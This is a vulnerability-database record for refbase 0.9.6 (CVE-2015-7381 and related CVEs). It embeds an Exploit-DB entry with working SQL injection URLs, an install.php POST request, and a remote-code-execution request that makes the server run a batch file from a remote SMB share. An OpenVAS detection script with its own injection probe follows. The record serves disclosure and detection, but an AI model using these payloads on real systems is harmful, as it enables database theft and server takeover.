ID CVE-2015-7381 Type cve Reporter cve@mitre.org Modified 2015-09-29T01:06:00
Description
Multiple PHP remote file inclusion vulnerabilities in install.php in Web Reference Database (aka refbase) through 0.9.6 allow remote attackers to execute arbitrary PHP code via the (1) pathToMYSQL or (2) databaseStructureFile parameter, a different issue than CVE-2015-6008.
{"exploitdb": [{"lastseen": "2016-02-04T07:45:46", "description": "refbase <= 0.9.6 - Multiple Vulnerabilities. CVE-2015-6008,CVE-2015-6009,CVE-2015-7381,CVE-2015-7382. Webapps exploit for php platform", "published": "2015-09-23T00:00:00", "type": "exploitdb", "title": "refbase <= 0.9.6 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7382", "CVE-2015-6009", "CVE-2015-7381", "CVE-2015-6008"], "modified": "2015-09-23T00:00:00", "id": "EDB-ID:38292", "href": "https://www.exploit-db.com/exploits/38292/", "sourceData": "# Exploit Title: Refbase <= 0.9.6 rss.php where parameter SQL Injection\r\n# Google Dork: \"powered by refbase\"\r\n# Date: 23 Sep 2015\r\n# Exploit Author: Mohab Ali\r\n# @0xAli\r\n# Vendor Homepage: http://www.refbase.net/index.php/Web_Reference_Database\r\n# Software Link: http://sourceforge.net/projects/refbase/\r\n# Reference: https://www.kb.cert.org/vuls/id/374092\r\n# Version: 0.8, 0.9, 0.9.5, 0.9.6\r\n# Tested on: WAMP (Windows)\r\n# CVE : CVE-2015-6009\r\n# Solution: Vulnerability hasn't been patched yet.\r\n\r\n**Summary **\r\nRefbase v 0.9.6 and earlier versions have an SQL injection vulnerability because of the insufficient validation when passing user supplied input to be passed to the database.\r\n\r\n\r\n** Vulnerable code **\r\n################################################################################\r\n#Line 35 : $queryWhereClause = $_REQUEST['where'];\r\n#Line 86 : $sanitizedWhereClause = extractWHEREclause(\" WHERE \" . $queryWhereClause);\r\n#Line 100: $sqlQuery .= \" FROM $tableRefs WHERE \" . $sanitizedWhereClause;\r\n#Line 123: $result = queryMySQLDatabase($query);\r\n################################################################################\r\n\r\n** Exploit POCs **\r\n/rss.php?where=1+and+5=(substr(@@version,1,1))-- -If it\u2019s true then the mysql version is > 5\r\n/rss.php?where='nonexistent'+union+all(select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,concat('version:',@@version,''),34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50)-- -\r\n/rss.php?where='nonexistent'+union+all(select+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41)-- -\r\n\r\n\r\n[!] Version 0.8 and 0.9 provide no validation, but versions 0.9.5 and 0.9.6 provide some filtering so you better let sqlmap handle it.\r\n[!] The GET parameter \"where\" is vulnerable to SQL injection despite being filtered by a custom function called extractWHEREclause() it\u2019s still can be bypassed to inject other queries.\r\nThe extractWHEREclause() function which is defined in include.inc.php and it removes any additional MySQL keywords.\r\npreg_replace(\"/^.*? WHERE (.+?)(?= ORDER BY| LIMIT| GROUP BY| HAVING| PROCEDURE| FOR UPDATE| LOCK IN|[ ;]+(SELECT|INSERT|UPDATE|DELETE|CREATE|ALTER|DROP|FILE)\\b|$).*?$/i\", \"\\\\1\", $query);\r\nBut it can be bypassed.\r\n\r\n\r\n# Contacted vendor: 23 Dec 2014\r\n# Public disclosure: 23 Sep 2015 \t\t\r\n\r\n################################################################################\r\n\r\n# Exploit Title: Refbase <= 0.9.6 install.php defaultCharacterSet parameter SQL Injection\r\n# Google Dork: \"powered by refbase\"\r\n# Public Disclosure Date: 21 Sep 2015\r\n# Exploit Author: Mohab Ali\r\n# @0xAli\r\n# Vendor Homepage: http://www.refbase.net/index.php/Web_Reference_Database\r\n# Software Link: http://sourceforge.net/projects/refbase/\r\n# Reference: https://www.kb.cert.org/vuls/id/374092\r\n# Version: 0.8, 0.9, 0.9.5, 0.9.6.\r\n# Tested on: WAMP (Windows)\r\n# CVE : CVE-2015-6009\r\n# Solution: Remove the install.php file after the installation\r\n\r\n**Summary **\r\nRefbase v 0.9.6 and earlier versions have an SQL injection vulnerability because of the insufficient validation when passing user supplied input to be passed to the database.\r\n\r\n[!] You have to know the correct MySQL credentials.\r\n\r\n** Vulnerable code **\r\n################################################################################\r\n#Line 77 : $defaultCharacterSet = $_POST['defaultCharacterSet'];\r\n#Line 407: $queryCreateDB = $queryCreateDB . \" DEFAULT CHARACTER SET \" . $defaultCharacterSet;\r\n#Line 424: if (!($result = @ mysql_query ($queryCreateDB, $connection)))\r\n################################################################################\r\n\r\n** Exploit POC **\r\n\r\nRequest:\r\nPOST /install.php\r\nformType=install&submit=Install&adminUserName=root&adminPassword=pass&pathToMYSQL=C:\\mysql5.6.17\\bin\\mysql.exe&databaseStructureFile=./install.sql&pathToBibutils=&defaultCharacterSet=SQL QUERY HERE&submit=Install\r\n\r\n################################################################################\r\n\r\n# Exploit Title: Refbase <= 0.9.6 install.php pathToMYSQL parameter RCE (Windows)\r\n# Google Dork: \"powered by refbase\"\r\n# Public Disclosure Date: 21 Sep 2015\r\n# Exploit Author: Mohab Ali\r\n# @0xAli\r\n# Vendor Homepage: http://www.refbase.net/index.php/Web_Reference_Database\r\n# Software Link: http://sourceforge.net/projects/refbase/\r\n# Reference: https://www.kb.cert.org/vuls/id/374092\r\n# Version: 0.9.6 and earlier. 0.6.1 and prior versions are not vulnerable.\r\n# Tested on: Windows\r\n# CVE : CVE-2015-6008\r\n# Solution: Remove the install.php file after the installation\r\n\r\n**Summary **\r\nRefbase v 0.9.6 and earlier versions have an RCE vulnerability because of the insufficient validation when passing user supplied input to be executed by the system.\r\n\r\n[!] You have to know the correct MySQL credentials and this doesn't appear to be exploitable on Linux since (AFAIK) it can't execute scripts remote smb shares by default.\r\n\r\n\r\n** Vulnerable code **\r\n################################################################################\r\n#Line 62: $pathToMYSQL = $_POST['pathToMYSQL'];\r\n#Line 67: $databaseStructureFile = $_POST['databaseStructureFile'];\r\n#Line 429: exec($pathToMYSQL . \" -h \" . $hostName . \" -u \" . $adminUserName . \" -p\" .$adminPassword . \" --database=\" . $databaseName . \" < \" . $databaseStructureFile . \" 2>&1\", $resultArray);\r\n################################################################################\r\n\r\n[*] pathToMYSQL and databaseStructureFile can't be empty, and has to be real file. And they can't contain ';' or '|'\r\n[*] To exploit this in Windows you can provide an executable on a remote share and execute it.\r\n\r\n** Exploit POC **\r\n\r\nRequest:\r\nformType=install&submit=Install&adminUserName=root&adminPassword=123&pathToMYSQL=%5C%5CSERVER_IP%5CShare%5Cexec.bat&databaseStructureFile=.%2Finstall.sql&pathToBibutils=&defaultCharacterSet=latin1&submit=Install\r\n\r\nExecuted command:\r\n\\\\SERVER_IP\\Share\\exec.bat -h localhost -u root -p123 --database=literature < ./install.sql 2>&1\r\n\r\n\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/38292/"}], "openvas": [{"lastseen": "2020-05-12T17:25:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-6007", "CVE-2015-6012", "CVE-2015-6010", "CVE-2015-7382", "CVE-2015-6011", "CVE-2015-6009", "CVE-2015-7381", "CVE-2015-7383", "CVE-2015-6008"], "description": "The host is installed with Reference\n Database and is prone to multiple vulnerabilities.", "modified": "2020-05-08T00:00:00", "published": "2015-10-05T00:00:00", "id": "OPENVAS:1361412562310806062", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806062", "type": "openvas", "title": "Web Reference Database Multiple Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Web Reference Database Multiple Vulnerabilities\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:refbase:refbase\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806062\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_cve_id(\"CVE-2015-6007\", \"CVE-2015-6008\", \"CVE-2015-6009\", \"CVE-2015-6010\",\n \"CVE-2015-6011\", \"CVE-2015-6012\", \"CVE-2015-7381\", \"CVE-2015-7382\",\n \"CVE-2015-7383\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-05 13:23:43 +0530 (Mon, 05 Oct 2015)\");\n script_tag(name:\"qod_type\", value:\"remote_active\");\n script_name(\"Web Reference Database Multiple Vulnerabilities\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Reference\n Database and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted data via HTTP GET request\n and check whether it is able to execute sql query or not.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to:\n\n - The application does not employ cross-site request forgery protection (CSRF)\n mechanisms, such as CSRF tokens.\n\n - Insufficient sanitization of user supplied input via referrer GET parameter\n by multiple pages.\n\n - Insufficient sanitization of user supplied via id GET parameter in unapi.php\n and stylesheet GET parameter in sru.php file.\n\n - Multiple input sanitization errors in install.php file via defaultCharacterSet,\n adminPassword, pathToMYSQL and databaseStructureFile POST parameters.\n\n - Insufficient sanitization of user supplied input via errorNo and errorMsg\n GET parameters in error.php file.\n\n - Insufficient sanitization of user supplied input via viewType GET parameter\n in duplicate_manager.php.\n\n - Insufficient sanitization of user supplied input via where GET parameter in\n rss.php file.\n\n - Insufficient sanitization of user supplied input via sqlQuery GET parameter\n in search.php file.\n\n - Insufficient sanitization of user supplied input via sourceText and sourceIDs\n POST variables in import.php file.\n\n - Insufficient sanitization of user supplied input via adminUserName POST\n parameter in update.php.\n\n - Insufficient sanitization of user supplied input via typeName and fileName\n POST parameters in modify.php file.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to submit valid requests to the server on behalf of authenticated\n users, execute arbitrary code on the server, directly read, write, and modify\n arbitrary data in the application's database, redirect victims to malicious\n web addresses.\");\n\n script_tag(name:\"affected\", value:\"refbase versions 0.9.6 and possibly earlier\");\n\n script_tag(name:\"solution\", value:\"As a workaround restrict access to the\n application to trusted users and networks and manually remove install.php\n and update.php scripts from production deployments of the application\n when they are not needed.\");\n\n script_tag(name:\"solution_type\", value:\"Workaround\");\n\n script_xref(name:\"URL\", value:\"http://www.kb.cert.org/vuls/id/374092\");\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/38292\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_refbase_detect.nasl\");\n script_mandatory_keys(\"Refbase/Installed\");\n script_require_ports(\"Services/www\", 80);\n script_xref(name:\"URL\", value:\"http://www.refbase.net/index.php/Web_Reference_Database\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nif(!refPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:refPort)){\n exit(0);\n}\n\nurl = dir + \"/rss.php?where=%27nonexistent%27+union+all(select+1,2,3,4,5,6,\"+\n \"7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,\"+\n \"29,30,31,32,concat(%27version:%27,%27You%20have%20an%20error%20\"+\n \"in%20your%20sql%20syntax%27,@@version,%27%27,%27SQL-INJECTION-\"+\n \"TEST%27),34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50)--%20-\";\n\nsndReq = http_get(item:url, port:refPort);\nrcvRes = http_keepalive_send_recv(port:refPort, data:sndReq);\n\nif(rcvRes =~ \"HTTP/1.1 302\")\n{\n Location = eregmatch( pattern:\"Location: ([0-9a-zA-Z.?=&%_-]+)\", string:rcvRes );\n url = \"/\" + Location[1];\n\n if(!Location[1]){\n exit(0);\n }\n\n if(http_vuln_check(port:refPort, url:url, check_header:FALSE,\n pattern:\"You have an error in your sql syntax\",\n extra_check:make_list(\"SQL-INJECTION-TEST\", \"refbase\")))\n {\n report = http_report_vuln_url( port:refPort, url:url );\n security_message(port:refPort, data:report);\n exit(0);\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
